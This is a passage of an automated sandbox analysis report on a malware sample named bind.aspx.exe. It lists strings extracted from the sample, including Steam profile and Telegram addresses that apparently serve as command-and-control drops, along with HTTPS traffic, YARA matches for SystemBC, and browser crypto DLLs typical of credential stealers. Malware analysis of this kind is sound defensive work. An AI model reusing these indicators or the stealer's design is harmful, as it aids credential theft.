                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199761128941
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: bind.aspx.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/badges
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/inventory/
                    Source: bind.aspx.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941b
                    Source: bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941m
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://store.steampowered.com/pri
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: bind.aspx.exeString found in binary or memory: https://t.me/iyigunl
                    Source: bind.aspx.exeString found in binary or memory: https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: BKKFHI.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: BKKFHI.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 135.181.31.18:443 -> 192.168.2.7:49709 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: Detects SystemBC Author: ditekSHen
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00359A6B4_2_00359A6B
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003590A54_2_003590A5
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00357CF54_2_00357CF5
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EAD2AC4_2_61EAD2AC
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E4B8A14_2_61E4B8A1
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E75F1F4_2_61E75F1F
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E400654_2_61E40065
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E9E24F4_2_61E9E24F
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E5023C4_2_61E5023C
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E625544_2_61E62554
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E9A4A74_2_61E9A4A7
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E4E4BF4_2_61E4E4BF
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E947834_2_61E94783
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E7A7904_2_61E7A790
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E187364_2_61E18736
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E866684_2_61E86668
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E586704_2_61E58670
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E108564_2_61E10856
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EA0BA94_2_61EA0BA9
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E62CA34_2_61E62CA3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E98FE24_2_61E98FE2
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E88FCA4_2_61E88FCA
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E52F804_2_61E52F80
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EA2F474_2_61EA2F47
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E56F184_2_61E56F18
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E4CEF94_2_61E4CEF9
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E1EEFF4_2_61E1EEFF
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E64E0C4_2_61E64E0C
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EA91F64_2_61EA91F6
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E9316A4_2_61E9316A
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E9F0ED4_2_61E9F0ED
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EA70CF4_2_61EA70CF
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E9D0C34_2_61E9D0C3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E8D0B64_2_61E8D0B6
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E6904E4_2_61E6904E
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E4304E4_2_61E4304E
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E153374_2_61E15337
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E192084_2_61E19208
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E534E34_2_61E534E3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E774524_2_61E77452
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E379304_2_61E37930
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E7B85E4_2_61E7B85E
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E218164_2_61E21816
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E9FBF04_2_61E9FBF0
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E55BD74_2_61E55BD7
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EA5B624_2_61EA5B62
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E91DC14_2_61E91DC1
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E6DDA54_2_61E6DDA5
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E31DAB4_2_61E31DAB
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E95D7A4_2_61E95D7A
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E5BC4C4_2_61E5BC4C
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E25FA24_2_61E25FA2
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E1DEC24_2_61E1DEC2
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E69E8F4_2_61E69E8F
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E89E0E4_2_61E89E0E
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: String function: 003420E8 appears 287 times
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: String function: 0035A11E appears 77 times
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs bind.aspx.exe
